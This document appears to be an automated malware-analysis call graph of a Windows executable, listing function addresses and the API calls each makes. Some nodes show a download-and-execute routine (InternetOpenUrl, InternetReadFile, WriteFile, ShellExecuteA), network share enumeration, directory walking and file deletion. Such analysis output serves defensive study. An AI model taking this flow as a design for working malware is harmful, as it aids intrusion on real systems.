__output_l 58 API calls 41909->41910 41911 427606 41910->41911 41946 4242d2 9 API calls __output_l 41911->41946 41914 4275db 41929 42a77e 41914->41929 41916 420504 41916->41881 41928 4264ef 78 API calls 6 library calls 41916->41928 41918 42766a 78 API calls __output_l 41918->41922 41919 4271b9 DecodePointer 41919->41922 41920 4276b2 78 API calls _write_multi_char 41920->41922 41922->41909 41922->41914 41922->41918 41922->41919 41922->41920 41923 43adf7 60 API calls __cftof 41922->41923 41925 42721c DecodePointer 41922->41925 41926 4276de 78 API calls _write_string 41922->41926 41927 427241 DecodePointer 41922->41927 41943 422bcc 58 API calls _LocaleUpdate::_LocaleUpdate 41922->41943 41944 428cde 58 API calls 2 library calls 41922->41944 41945 420bed 58 API calls 2 library calls 41922->41945 41923->41922 41925->41922 41926->41922 41927->41922 41928->41881 41930 42a786 41929->41930 41931 42a788 IsProcessorFeaturePresent 41929->41931 41930->41916 41933 42ab9c 41931->41933 41947 42ab4b 5 API calls 2 library calls 41933->41947 41935 42ac7f 41935->41916 41937 428175 41936->41937 41938 42818a 41936->41938 41939 425208 __output_l 58 API calls 41937->41939 41938->41922 41940 42817a 41939->41940 41948 4242d2 9 API calls __output_l 41940->41948 41942 428185 41942->41922 41943->41922 41944->41922 41945->41922 41946->41914 41947->41935 41948->41942 41950 420eb3 EnterCriticalSection 41949->41950 41951 420e9d 41949->41951 41950->41891 41952 428af7 __lock 58 API calls 41951->41952 41953 420ea6 41952->41953 41953->41891 41955 42816b __output_l 58 API calls 41954->41955 41956 42afdf 41955->41956 41967 4389c2 41956->41967 41958 42afe5 __flsbuf 41960 42b034 41958->41960 41976 428cde 58 API calls 2 library calls 41958->41976 41960->41894 41962 42afaa 41961->41962 41963 421faf 41961->41963 41962->41963 41978 42836b 41962->41978 41966 421fc9 LeaveCriticalSection LeaveCriticalSection __flsbuf __getstream 41963->41966 41965->41892 41966->41892 41968 4389cd 41967->41968 41970 4389da 41967->41970 41969 425208 __output_l 58 API calls 41968->41969 41971 4389d2 41969->41971 41972 4389e6 41970->41972 41973 425208 __output_l 58 API calls 41970->41973 41971->41958 41972->41958 41974 438a07 41973->41974 41977 4242d2 9 API calls __output_l 41974->41977 41976->41960 41977->41971 41979 42837e 41978->41979 41983 4283a2 41978->41983 41980 42816b __output_l 58 API calls 41979->41980 41979->41983 41981 42839b 41980->41981 41984 42df14 41981->41984 41983->41963 41985 42df20 __initptd 41984->41985 41986 42df2d 41985->41986 41989 42df44 41985->41989 42084 4251d4 58 API calls __getptd_noexit 41986->42084 41988 42dfe3 42088 4251d4 58 API calls __getptd_noexit 41988->42088 41989->41988 41991 42df58 41989->41991 41990 42df32 41993 425208 __output_l 58 API calls 41990->41993 41994 42df80 41991->41994 41995 42df76 41991->41995 42004 42df39 __initptd 41993->42004 42012 43b134 41994->42012 42085 4251d4 58 API calls __getptd_noexit 41995->42085 41996 42df7b 42000 425208 __output_l 58 API calls 41996->42000 41999 42df86 42001 42df99 41999->42001 42002 42dfac 41999->42002 42003 42dfef 42000->42003 42021 42e003 42001->42021 42005 425208 __output_l 58 API calls 42002->42005 42089 4242d2 9 API calls __output_l 42003->42089 42004->41983 42008 42dfb1 42005->42008 42086 4251d4 58 API calls __getptd_noexit 42008->42086 42009 42dfa5 42087 42dfdb LeaveCriticalSection __unlock_fhandle 42009->42087 42013 43b140 __initptd 42012->42013 42014 43b18f EnterCriticalSection 42013->42014 42016 428af7 __lock 58 API calls 42013->42016 42015 43b1b5 __initptd 42014->42015 42015->41999 42017 43b165 42016->42017 42018 43b17d 42017->42018 42090 43263e InitializeCriticalSectionAndSpinCount 42017->42090 42091 43b1b9 LeaveCriticalSection _doexit 42018->42091 42022 42e010 __write_nolock 42021->42022 42023 42e06e 42022->42023 42024 42e04f 42022->42024 42052 42e044 42022->42052 42028 42e0c6 42023->42028 42029 42e0aa 42023->42029 42092 4251d4 58 API calls __getptd_noexit 42024->42092 42026 42a77e __output_l 6 API calls 42030 42e864 42026->42030 42027 42e054 42031 425208 __output_l 58 API calls 42027->42031 42032 42e0df 42028->42032 42096 42f744 60 API calls 3 library calls 42028->42096 42094 4251d4 58 API calls __getptd_noexit 42029->42094 42030->42009 42034 42e05b 42031->42034 42036 4389c2 __read_nolock 58 API calls 42032->42036 42093 4242d2 9 API calls __output_l 42034->42093 42039 42e0ed 42036->42039 42037 42e0af 42040 425208 __output_l 58 API calls 42037->42040 42041 42e446 42039->42041 42046 425007 _LanguageEnumProc@4 58 API calls 42039->42046 42042 42e0b6 42040->42042 42043 42e464 42041->42043 42044 42e7d9 WriteFile 42041->42044 42095 4242d2 9 API calls __output_l 42042->42095 42047 42e588 42043->42047 42056 42e47a 42043->42056 42048 42e439 GetLastError 42044->42048 42074 42e678 42044->42074 42049 42e119 GetConsoleMode 42046->42049 42058 42e593 42047->42058 42061 42e67d 42047->42061 42054 42e406 42048->42054 42049->42041 42051 42e158 42049->42051 42050 42e812 42050->42052 42053 425208 __output_l 58 API calls 42050->42053 42051->42041 42055 42e168 GetConsoleCP 42051->42055 42052->42026 42059 42e840 42053->42059 42054->42050 42054->42052 42060 42e566 42054->42060 42055->42050 42081 42e197 42055->42081 42056->42050 42056->42054 42057 42e4e9 WriteFile 42056->42057 42057->42048 42057->42056 42058->42050 42062 42e5f8 WriteFile 42058->42062 42100 4251d4 58 API calls __getptd_noexit 42059->42100 42064 42e571 42060->42064 42065 42e809 42060->42065 42061->42050 42066 42e6f2 WideCharToMultiByte 42061->42066 42062->42048 42070 42e647 42062->42070 42067 425208 __output_l 58 API calls 42064->42067 42099 4251e7 58 API calls 2 library calls 42065->42099 42066->42048 42077 42e739 42066->42077 42071 42e576 42067->42071 42069 42e741 WriteFile 42073 42e794 GetLastError 42069->42073 42069->42077 42070->42054 42070->42058 42070->42074 42098 4251d4 58 API calls __getptd_noexit 42071->42098 42073->42077 42074->42054 42076 43c76c 60 API calls __write_nolock 42076->42081 42077->42054 42077->42061 42077->42069 42077->42074 42078 42e280 WideCharToMultiByte 42078->42054 42079 42e2bb WriteFile 42078->42079 42079->42048 42082 42e2ed 42079->42082 42080 44058c WriteConsoleW CreateFileW __putwch_nolock 42080->42082 42081->42054 42081->42076 42081->42078 42081->42082 42097 422d33 58 API calls __isleadbyte_l 42081->42097 42082->42048 42082->42054 42082->42080 42082->42081 42083 42e315 WriteFile 42082->42083 42083->42048 42083->42082 42084->41990 42085->41996 42086->42009 42087->42004 42088->41996 42089->42004 42090->42018 42091->42014 42092->42027 42093->42052 42094->42037 42095->42052 42096->42032 42097->42081 42098->42052 42099->42052 42100->42052 42101->41852 42102->41855 42103->41858 42104->41862 42105->41871 42107 413c62 42106->42107 42114 413c74 _memset 42106->42114 42108 413c67 42107->42108 42109 413c96 42107->42109 42111 423b4c 59 API calls 42108->42111 42123 44f23e 59 API calls 2 library calls 42109->42123 42112 413c6d 42111->42112 42112->42114 42124 44f1bb 59 API calls 3 library calls 42112->42124 42114->41328 42117 418513 42116->42117 42122 418520 42116->42122 42117->42122 42125 415810 59 API calls __expandlocale 42117->42125 42119 418619 42119->41330 42120 44f23e 59 API calls 42120->42122 42122->42119 42122->42120 42126 416760 59 API calls 2 library calls 42122->42126 42125->42122 42126->42122 42127->41332 42128->41336 42129->41338 42130->41343 42131->41345 42132->41365 42133->41365 42134->41390 42135->41390 42136->41394 42137->41394 42138->41404 42171 421037 42139->42171 42141 40c78a 42141->41416 42168 420546 58 API calls __output_l 42141->42168 42143 422909 __initptd 42142->42143 42144 42291c 42143->42144 42145 422941 __expandlocale 42143->42145 42146 425208 __output_l 58 API calls 42144->42146 42376 420e53 42145->42376 42147 422921 42146->42147 42375 4242d2 9 API calls __output_l 42147->42375 42150 42292c __initptd 42150->41423 42151 422950 42152 422981 42151->42152 42382 42d6c7 80 API calls 4 library calls 42151->42382 42383 4229a1 LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 42152->42383 42156 423a44 __initptd 42155->42156 42157 423a70 42156->42157 42158 423a58 42156->42158 42160 420e53 __lock_file 59 API calls 42157->42160 42164 423a68 __initptd 42157->42164 42159 425208 __output_l 58 API calls 42158->42159 42161 423a5d 42159->42161 42162 423a82 42160->42162 42400 4242d2 9 API calls __output_l 42161->42400 42384 4239cc 42162->42384 42164->41425 42168->41428 42169->41428 42170->41428 42174 421043 __initptd 42171->42174 42172 421056 42173 425208 __output_l 58 API calls 42172->42173 42175 42105b 42173->42175 42174->42172 42176 421087 42174->42176 42220 4242d2 9 API calls __output_l 42175->42220 42190 428df4 42176->42190 42179 42108c 42180 4210a2 42179->42180 42181 421095 42179->42181 42182 4210cc 42180->42182 42183 4210ac 42180->42183 42184 425208 __output_l 58 API calls 42181->42184 42205 428f13 42182->42205 42185 425208 __output_l 58 API calls 42183->42185 42187 421066 __initptd @_EH4_CallFilterFunc@8 42184->42187 42185->42187 42187->42141 42191 428e00 __initptd 42190->42191 42192 428af7 __lock 58 API calls 42191->42192 42193 428e0e 42192->42193 42194 428e89 42193->42194 42199 420e92 _flsall 59 API calls 42193->42199 42201 428b9f __mtinitlocknum 58 API calls 42193->42201 42203 428e82 42193->42203 42225 420efc LeaveCriticalSection LeaveCriticalSection _doexit 42193->42225 42226 428cde 58 API calls 2 library calls 42194->42226 42197 428eff __initptd 42197->42179 42198 428e90 42198->42203 42227 43263e InitializeCriticalSectionAndSpinCount 42198->42227 42199->42193 42201->42193 42202 428eb6 EnterCriticalSection 42202->42203 42222 428f0a 42203->42222 42214 428f33 _TestDefaultCountry 42205->42214 42206 428f4d 42207 425208 __output_l 58 API calls 42206->42207 42209 428f52 42207->42209 42208 429108 42208->42206 42212 42916b 42208->42212 42232 4242d2 9 API calls __output_l 42209->42232 42211 4210d7 42221 4210f9 LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 42211->42221 42229 43c214 42212->42229 42214->42206 42214->42208 42233 43c232 60 API calls 2 library calls 42214->42233 42216 429101 42216->42208 42234 43c232 60 API calls 2 library calls 42216->42234 42218 429120 42218->42208 42235 43c232 60 API calls 2 library calls 42218->42235 42220->42187 42221->42187 42228 428c81 LeaveCriticalSection 42222->42228 42224 428f11 42224->42197 42225->42193 42226->42198 42227->42202 42228->42224 42236 43b9f8 42229->42236 42231 43c22d 42231->42211 42232->42211 42233->42216 42234->42218 42235->42208 42239 43ba04 __initptd 42236->42239 42237 43ba1a 42238 425208 __output_l 58 API calls 42237->42238 42240 43ba1f 42238->42240 42239->42237 42241 43ba50 42239->42241 42321 4242d2 9 API calls __output_l 42240->42321 42247 43bac1 42241->42247 42246 43ba29 __initptd 42246->42231 42248 43bae1 42247->42248 42323 447f50 42248->42323 42250 43bc34 42369 4242fd 8 API calls 2 library calls 42250->42369 42252 43bafd 42252->42250 42254 43bb37 42252->42254 42259 43bb5a 42252->42259 42253 43c213 42354 4251d4 58 API calls __getptd_noexit 42254->42354 42256 43bb3c 42257 425208 __output_l 58 API calls 42256->42257 42258 43bb49 42257->42258 42355 4242d2 9 API calls __output_l 42258->42355 42260 43bc18 42259->42260 42268 43bbf6 42259->42268 42356 4251d4 58 API calls __getptd_noexit 42260->42356 42263 43ba6c 42322 43ba95 LeaveCriticalSection __unlock_fhandle 42263->42322 42264 43bc1d 42265 425208 __output_l 58 API calls 42264->42265 42266 43bc2a 42265->42266 42357 4242d2 9 API calls __output_l 42266->42357 42330 43b1c2 42268->42330 42270 43bcc4 42271 43bcf1 42270->42271 42272 43bcce 42270->42272 42348 43b88d 42271->42348 42358 4251d4 58 API calls __getptd_noexit 42272->42358 42275 43bcd3 42276 425208 __output_l 58 API calls 42275->42276 42278 43bcdd 42276->42278 42277 43bd91 GetFileType 42279 43bdde 42277->42279 42280 43bd9c GetLastError 42277->42280 42284 425208 __output_l 58 API calls 42278->42284 42361 43b56e 59 API calls 2 library calls 42279->42361 42360 4251e7 58 API calls 2 library calls 42280->42360 42281 43bd5f GetLastError 42359 4251e7 58 API calls 2 library calls 42281->42359 42284->42263 42286 43b88d ___createFile 3 API calls 42289 43bd54 42286->42289 42287 43bd84 42292 425208 __output_l 58 API calls 42287->42292 42288 43bdc3 CloseHandle 42288->42287 42291 43bdd1 42288->42291 42289->42277 42289->42281 42293 425208 __output_l 58 API calls 42291->42293 42292->42250 42294 43bdd6 42293->42294 42294->42287 42295 43bfb7 42295->42250 42298 43c18a CloseHandle 42295->42298 42296 43bdfc 42296->42295 42313 43be7d 42296->42313 42362 42f744 60 API calls 3 library calls 42296->42362 42300 43b88d ___createFile 3 API calls 42298->42300 42299 43be66 42318 43be85 42299->42318 42363 4251d4 58 API calls __getptd_noexit 42299->42363 42302 43c1b1 42300->42302 42301 42b5c4 70 API calls __read_nolock 42301->42318 42304 43c041 42302->42304 42305 43c1b9 GetLastError 42302->42305 42304->42250 42367 4251e7 58 API calls 2 library calls 42305->42367 42308 43c1c5 42368 43b36b 59 API calls 2 library calls 42308->42368 42311 42f744 60 API calls __lseeki64_nolock 42311->42313 42312 42df14 __write 78 API calls 42312->42313 42313->42295 42313->42311 42313->42312 42313->42318 42314 43c034 42366 430b25 61 API calls 3 library calls 42314->42366 42315 43c01d 42315->42295 42317 43c03b 42320 425208 __output_l 58 API calls 42317->42320 42318->42301 42318->42313 42318->42314 42318->42315 42319 42f744 60 API calls __lseeki64_nolock 42318->42319 42364 430b25 61 API calls 3 library calls 42318->42364 42365 447cac 82 API calls 6 library calls 42318->42365 42319->42318 42320->42304 42321->42246 42322->42246 42324 447f6f 42323->42324 42325 447f5a 42323->42325 42324->42252 42326 425208 __output_l 58 API calls 42325->42326 42327 447f5f 42326->42327 42370 4242d2 9 API calls __output_l 42327->42370 42329 447f6a 42329->42252 42331 43b1ce __initptd 42330->42331 42332 428b9f __mtinitlocknum 58 API calls 42331->42332 42333 43b1df 42332->42333 42334 428af7 __lock 58 API calls 42333->42334 42335 43b1e4 __initptd 42333->42335 42341 43b1f2 42334->42341 42335->42270 42337 43b2d2 42373 428c96 58 API calls 2 library calls 42337->42373 42339 428af7 __lock 58 API calls 42339->42341 42340 43b272 EnterCriticalSection 42340->42341 42343 43b282 LeaveCriticalSection 42340->42343 42341->42337 42341->42339 42341->42340 42347 43b340 42341->42347 42371 43263e InitializeCriticalSectionAndSpinCount 42341->42371 42372 43b29a LeaveCriticalSection _doexit 42341->42372 42342 43b2db 42344 43b134 ___lock_fhandle 59 API calls 42342->42344 42342->42347 42343->42341 42344->42347 42374 43b362 LeaveCriticalSection _doexit 42347->42374 42349 43b898 ___crtIsPackagedApp 42348->42349 42350 43b8f3 CreateFileW 42349->42350 42351 43b89c GetModuleHandleW GetProcAddress 42349->42351 42352 43b911 42350->42352 42353 43b8b9 42351->42353 42352->42277 42352->42281 42352->42286 42353->42352 42354->42256 42355->42263 42356->42264 42357->42250 42358->42275 42359->42287 42360->42288 42361->42296 42362->42299 42363->42313 42364->42318 42365->42318 42366->42317 42367->42308 42368->42304 42369->42253 42370->42329 42371->42341 42372->42341 42373->42342 42374->42335 42375->42150 42377 420e63 42376->42377 42378 420e85 EnterCriticalSection 42376->42378 42377->42378 42380 420e6b 42377->42380 42379 420e7b 42378->42379 42379->42151 42381 428af7 __lock 58 API calls 42380->42381 42381->42379 42382->42151 42383->42150 42385 4239db 42384->42385 42386 4239ef 42384->42386 42387 425208 __output_l 58 API calls 42385->42387 42389 42836b __flush 78 API calls 42386->42389 42393 4239eb 42386->42393 42388 4239e0 42387->42388 42402 4242d2 9 API calls __output_l 42388->42402 42391 4239fb 42389->42391 42403 430bbf 58 API calls _free 42391->42403 42401 423aa7 LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 42393->42401 42394 423a03 42395 42816b __output_l 58 API calls 42394->42395 42396 423a09 42395->42396 42404 430a4a 63 API calls 6 library calls 42396->42404 42398 423a0f 42398->42393 42405 420bed 58 API calls 2 library calls 42398->42405 42400->42164 42401->42164 42402->42393 42403->42394 42404->42398 42405->42393 42407 415ab8 42406->42407 42408 4159e8 42406->42408 42485 44f26c 59 API calls 3 library calls 42407->42485 42409 415ac2 42408->42409 42410 415a02 42408->42410 42486 44f23e 59 API calls 2 library calls 42409->42486 42413 415a1a 42410->42413 42414 415acc 42410->42414 42423 415a2a __expandlocale 42410->42423 42416 416950 59 API calls 42413->42416 42413->42423 42487 44f23e 59 API calls 2 library calls 42414->42487 42416->42423 42423->41445 42485->42409 42618 423f74 42575->42618 42578 41f196 Sleep 42579 41f1c1 42578->42579 42580 41f94b 42578->42580 42581 410a50 65 API calls 42579->42581 42582 414690 59 API calls 42580->42582 42587 41f1cd 42581->42587 42583 41f97a 42582->42583 42678 410160 89 API calls 5 library calls 42583->42678 42585 415c10 59 API calls 42586 41f274 42585->42586 42621 40f730 42586->42621 42590 420235 _LanguageEnumProc@4 60 API calls 42587->42590 42593 41f216 42587->42593 42589 41f9c1 SendMessageW 42591 41f9e1 42589->42591 42615 41f8af 42589->42615 42590->42587 42591->42615 42592 4111c0 170 API calls 42595 41f987 42592->42595 42593->42585 42594 411ab0 PeekMessageW DispatchMessageW PeekMessageW 42594->42595 42595->42589 42595->42592 42595->42594 42596 41f281 42597 415c10 59 API calls 42596->42597 42599 41f392 42596->42599 42601 40f730 192 API calls 42596->42601 42597->42596 42598 415c10 59 API calls 42598->42599 42599->42598 42603 40f730 192 API calls 42599->42603 42607 41f52c 42599->42607 42600 41f5bd PeekMessageW 42600->42607 42601->42596 42602 415c10 59 API calls 42606 41f73e 42602->42606 42603->42599 42604 41f689 42604->42602 42605 414690 59 API calls 42605->42607 42610 40f730 192 API calls 42606->42610 42607->42600 42607->42604 42607->42605 42608 40f730 192 API calls 42607->42608 42609 41f5d6 DispatchMessageW PeekMessageW 42607->42609 42608->42607 42609->42607 42616 41f74b 42610->42616 42611 41f893 SendMessageW 42611->42615 42612 41f7cf PeekMessageW 42612->42616 42613 414690 59 API calls 42613->42616 42614 41f7e7 DispatchMessageW PeekMessageW 42614->42616 42616->42611 42616->42612 42616->42613 42616->42614 42617 40f730 192 API calls 42616->42617 42617->42616 42619 425007 _LanguageEnumProc@4 58 API calls 42618->42619 42620 41f16a Sleep 42619->42620 42620->42578 42620->42615 42622 411ab0 3 API calls 42621->42622 42631 40f765 42622->42631 42623 40f8b5 42624 414690 59 API calls 42623->42624 42625 40f8ea PathFindFileNameW 42624->42625 42627 40f923 42625->42627 42626 414690 59 API calls 42626->42631 42627->42627 42628 415c10 59 API calls 42627->42628 42629 40f98c 42628->42629 42630 413520 59 API calls 42629->42630 42641 40f9a8 _memmove 42630->42641 42631->42623 42631->42626 42632 415ae0 59 API calls 42631->42632 42633 420235 _LanguageEnumProc@4 60 API calls 42631->42633 42642 40f927 42631->42642 42632->42631 42633->42631 42634 40fa44 PathFindFileNameW 42634->42641 42635 40fb28 42636 414690 59 API calls 42635->42636 42660 40fcdc 42635->42660 42640 40fb55 42636->42640 42637 415c10 59 API calls 42637->42641 42679 40f310 LoadLibraryW 42640->42679 42641->42634 42641->42635 42641->42637 42643 413520 59 API calls 42641->42643 42642->42596 42643->42641 42646 40fb5a 42647 414690 59 API calls 42646->42647 42646->42660 42648 40fb75 42647->42648 42649 413a90 59 API calls 42648->42649 42650 40fb86 PathAppendW 42649->42650 42654 418400 59 API calls 42650->42654 42651 410052 FindNextFileW 42652 41006b FindClose 42651->42652 42676 40fd22 _wcsstr 42651->42676 42652->42642 42655 40fbfe _memmove 42654->42655 42656 40fc4f PathFileExistsW 42655->42656 42659 40fc6d 42656->42659 42656->42660 42657 417140 59 API calls 42657->42676 42658 411ab0 3 API calls 42658->42676 42662 420c62 _malloc 58 API calls 42659->42662 42719 417140 42660->42719 42661 415ae0 59 API calls 42661->42676 42663 40fc77 lstrcpyW 42662->42663 42666 40fca1 42663->42666 42667 40fca3 lstrcatW 42663->42667 42665 414690 59 API calls 42665->42676 42666->42667 42669 414690 59 API calls 42667->42669 42671 40fccf 42669->42671 42712 40f0e0 CreateFileW 42671->42712 42672 40ff41 PathFindExtensionW 42672->42676 42674 40fcd6 42742 420bed 58 API calls 2 library calls 42674->42742 42676->42642 42676->42651 42676->42657 42676->42658 42676->42661 42676->42665 42677 4111c0 170 API calls 42676->42677 42727 415ae0 42676->42727 42743 413b70 59 API calls 42676->42743 42677->42676 42678->42595 42680 40f34b GetProcAddress 42679->42680 42683 40f344 42679->42683 42681 413a90 59 API calls 42680->42681 42682 40f368 42681->42682 42684 418400 59 API calls 42682->42684 42683->42646 42685 40f39d 42684->42685 42686 415c10 59 API calls 42685->42686 42687 40f3c4 42686->42687 42688 415c10 59 API calls 42687->42688 42689 40f3eb 42688->42689 42744 40f2b0 59 API calls 42689->42744 42691 40f3fe 42692 415c10 59 API calls 42691->42692 42693 40f45e 42692->42693 42694 415c10 59 API calls 42693->42694 42695 40f485 42694->42695 42745 40f2b0 59 API calls 42695->42745 42697 40f50a 42700 40f542 42697->42700 42747 418380 65 API calls __forcdecpt_l 42697->42747 42698 40f498 42698->42697 42746 418380 65 API calls __forcdecpt_l 42698->42746 42702 40f560 FreeLibrary 42700->42702 42703 40f56e 42700->42703 42705 40f6c7 42702->42705 42704 413520 59 API calls 42703->42704 42706 40f57d 42704->42706 42705->42683 42708 413520 59 API calls 42706->42708 42710 40f5ed 42706->42710 42707 40f6a5 FreeLibrary 42707->42705 42708->42710 42709 413520 59 API calls 42711 40f65d 42709->42711 42710->42707 42710->42709 42711->42707 42713 40f1b4 42712->42713 42714 40f136 42712->42714 42713->42674 42715 415c10 59 API calls 42714->42715 42716 40f178 42715->42716 42717 412840 60 API calls 42716->42717 42718 40f183 lstrlenA WriteFile CloseHandle 42717->42718 42718->42713 42720 417197 42719->42720 42722 415d50 59 API calls 42720->42722 42725 4171c8 42720->42725 42721 4159d0 59 API calls 42723 4171ef 42721->42723 42722->42725 42724 415ae0 59 API calls 42723->42724 42726 40fd00 FindFirstFileW 42724->42726 42725->42721 42726->42676 42728 415b36 42727->42728 42731 415aee 42727->42731 42729 415bf1 42728->42729 42730 415b49 42728->42730 42748 44f23e 59 API calls 2 library calls 42729->42748 42733 415b61 42730->42733 42734 415bfb 42730->42734 42739 415b71 __expandlocale 42730->42739 42731->42728 42738 415b15 42731->42738 42736 416950 59 API calls 42733->42736 42733->42739 42749 44f23e 59 API calls 2 library calls 42734->42749 42736->42739 42740 4159d0 59 API calls 42738->42740 42739->42672 42741 415b30 42740->42741 42741->42672 42742->42660 42743->42676 42744->42691 42745->42698 42746->42697 42747->42700 42753 410bd0 WNetOpenEnumW 42750->42753 42752 41fd95 SendMessageW 42754 410c33 GlobalAlloc 42753->42754 42755 410c1c 42753->42755 42758 410c45 _memset 42754->42758 42755->42752 42756 410c51 WNetEnumResourceW 42757 410ea3 WNetCloseEnum 42756->42757 42756->42758 42757->42752 42758->42756 42758->42758 42759 415c10 59 API calls 42758->42759 42760 4150c0 59 API calls 42758->42760 42761 418fd0 59 API calls 42758->42761 42762 410bd0 59 API calls 42758->42762 42759->42758 42760->42758 42761->42758 42762->42758 42764 42f7c0 __write_nolock 42763->42764 42765 41e6b6 timeGetTime 42764->42765 42766 423f74 58 API calls 42765->42766 42767 41e6cc 42766->42767 42880 40c6a0 RegOpenKeyExW 42767->42880 42770 41e72e InternetOpenW 42793 41e6d4 _memset _strstr _wcsstr 42770->42793 42771 415ae0 59 API calls 42771->42793 42772 41ea8d lstrlenA lstrcpyA lstrcpyA lstrlenA 42772->42793 42773 41ea4c SHGetFolderPathA 42774 41ea67 PathAppendA DeleteFileA 42773->42774 42773->42793 42774->42793 42776 41eada lstrlenA 42776->42793 42777 414690 59 API calls 42789 41e7be _memmove 42777->42789 42778 41ee4d 42779 40ef50 58 API calls 42778->42779 42784 41ee5d 42779->42784 42780 412900 60 API calls 42780->42793 42782 413ff0 59 API calls 42782->42793 42783 41eb53 lstrcpyW 42785 41eb74 lstrlenA 42783->42785 42783->42793 42787 413ea0 59 API calls 42784->42787 42791 41eeb1 42784->42791 42788 420c62 _malloc 58 API calls 42785->42788 42786 4159d0 59 API calls 42786->42793 42787->42784 42788->42793 42789->42777 42789->42778 42789->42793 42921 40dd40 73 API calls 4 library calls 42789->42921 42923 420bed 58 API calls 2 library calls 42789->42923 42924 411b10 7 API calls 42789->42924 42790 41e8f3 lstrcpyW 42792 41e943 InternetOpenUrlW InternetReadFile 42790->42792 42790->42793 42794 40ef50 58 API calls 42791->42794 42796 41e9ec InternetCloseHandle InternetCloseHandle 42792->42796 42797 41e97c SHGetFolderPathA 42792->42797 42793->42770 42793->42771 42793->42772 42793->42773 42793->42776 42793->42780 42793->42782 42793->42783 42793->42785 42793->42786 42793->42789 42793->42790 42793->42792 42795 41eb99 MultiByteToWideChar lstrcpyW 42793->42795 42793->42796 42800 41e93c lstrcatW 42793->42800 42801 41ec3d lstrlenW lstrlenA lstrcpyA lstrcpyA lstrlenA 42793->42801 42803 41ebf0 SHGetFolderPathA 42793->42803 42806 41e9c4 lstrlenA 42793->42806 42808 41ecaa lstrlenA 42793->42808 42810 4156d0 59 API calls 42793->42810 42812 423a38 __fcloseall 83 API calls 42793->42812 42815 41ed1f lstrcpyW 42793->42815 42817 41ed43 lstrlenA 42793->42817 42823 41ed68 MultiByteToWideChar lstrcpyW lstrlenW 42793->42823 42829 41edc3 SHGetFolderPathA 42793->42829 42885 40c500 SHGetFolderPathA 42793->42885 42922 420bed 58 API calls 2 library calls 42793->42922 42802 41eec1 42794->42802 42795->42793 42796->42793 42797->42796 42798 41e996 PathAppendA 42797->42798 42905 4220b6 42798->42905 42800->42792 42801->42793 42804 413ea0 59 API calls 42802->42804 42809 41ef12 42802->42809 42803->42793 42805 41ec17 PathAppendA DeleteFileA 42803->42805 42804->42802 42805->42793 42908 422b02 42806->42908 42808->42793 42811 413ff0 59 API calls 42809->42811 42810->42793 42813 41ef3a 42811->42813 42812->42793 42814 412900 60 API calls 42813->42814 42816 41ef45 lstrcpyW 42814->42816 42815->42793 42815->42817 42820 41ef6a 42816->42820 42819 420c62 _malloc 58 API calls 42817->42819 42819->42793 42821 413ff0 59 API calls 42820->42821 42822 41ef9f 42821->42822 42824 412900 60 API calls 42822->42824 42823->42793 42826 41edad lstrlenW 42823->42826 42825 41efac lstrcpyW 42824->42825 42833 41efc8 42825->42833 42826->42793 42828 41ee44 42826->42828 42829->42793 42830 41edea PathAppendA DeleteFileA 42829->42830 42830->42793 42833->42828 42835 41dbf6 __write_nolock 42834->42835 42836 413ff0 59 API calls 42835->42836 42837 41dc31 42836->42837 42838 4156d0 59 API calls 42837->42838 42839 41dc82 42838->42839 42840 413ff0 59 API calls 42839->42840 42841 41dcb1 42840->42841 42842 40ecb0 60 API calls 42841->42842 42843 41dcc5 42842->42843 42844 41dcf0 LoadLibraryW GetProcAddress 42843->42844 42858 41e3d3 42843->42858 42845 413c40 59 API calls 42844->42845 42846 41dd1a UuidCreate UuidToStringA 42845->42846 42848 41dd84 42846->42848 42848->42848 42849 4156d0 59 API calls 42848->42849 42850 41dda7 RpcStringFreeA PathAppendA CreateDirectoryA 42849->42850 42851 4184e0 59 API calls 42850->42851 42852 41de18 42851->42852 42853 413ff0 59 API calls 42852->42853 42854 41de4c 42853->42854 42855 412900 60 API calls 42854->42855 42856 41de5c 42855->42856 42857 413580 59 API calls 42856->42857 42872 41de73 _memset _wcsstr 42857->42872 42859 41deec InternetOpenA 42860 413ff0 59 API calls 42859->42860 42860->42872 42861 412900 60 API calls 42861->42872 42862 414690 59 API calls 42868 41df60 _memmove 42862->42868 42863 414690 59 API calls 42863->42872 42864 412840 60 API calls 42864->42872 42866 41e079 InternetOpenUrlA 42866->42872 42867 41e0e2 HttpQueryInfoW 42867->42872 42868->42862 42868->42872 43025 40dd40 73 API calls 4 library calls 42868->43025 42869 413ff0 59 API calls 42869->42872 42870 413010 59 API calls 42870->42872 42871 41e1ec lstrcpyA PathAppendA 42871->42872 42872->42858 42872->42859 42872->42861 42872->42863 42872->42864 42872->42866 42872->42867 42872->42868 42872->42869 42872->42870 42872->42871 42873 4156d0 59 API calls 42872->42873 42876 41e2b1 InternetReadFile 42872->42876 42877 41e316 CloseHandle InternetCloseHandle InternetCloseHandle 42872->42877 42878 41e2dc WriteFile 42872->42878 42879 41e334 ShellExecuteA 42872->42879 42874 41e267 CreateFileA 42873->42874 42874->42872 42875 41e299 SetFilePointer 42874->42875 42875->42872 42876->42872 42877->42872 42878->42872 42878->42877 42879->42872 42881 40c734 42880->42881 42882 40c6cc RegQueryValueExW 42880->42882 42881->42793 42883 40c70c RegSetValueExW RegCloseKey 42882->42883 42884 40c6fd RegCloseKey 42882->42884 42883->42881 42884->42793 42886 40c525 42885->42886 42887 40c52c PathAppendA 42885->42887 42886->42793 42888 4220b6 125 API calls 42887->42888 42889 40c550 42888->42889 42890 40c559 42889->42890 42925 42387f 85 API calls 5 library calls 42889->42925 42890->42793 42892 40c56c 42926 423455 69 API calls 4 library calls 42892->42926 42894 40c572 42927 420cf4 84 API calls 5 library calls 42894->42927 42896 40c57a 42897 40c5a5 42896->42897 42898 40c589 42896->42898 42899 423a38 __fcloseall 83 API calls 42897->42899 42928 4222f5 74 API calls __fread_nolock 42898->42928 42901 40c5ab 42899->42901 42901->42793 42902 40c593 42903 423a38 __fcloseall 83 API calls 42902->42903 42904 40c599 42903->42904 42904->42793 42929 421ff2 42905->42929 42907 4220c6 42907->42793 42909 422b0e __initptd 42908->42909 42910 422b44 42909->42910 42911 422b2c 42909->42911 42912 422b3c __initptd 42909->42912 42913 420e53 __lock_file 59 API calls 42910->42913 42914 425208 __output_l 58 API calls 42911->42914 42912->42793 42915 422b4a 42913->42915 42916 422b31 42914->42916 43023 4229a9 78 API calls 5 library calls 42915->43023 43022 4242d2 9 API calls __output_l 42916->43022 42919 422b5e 43024 422b7c LeaveCriticalSection 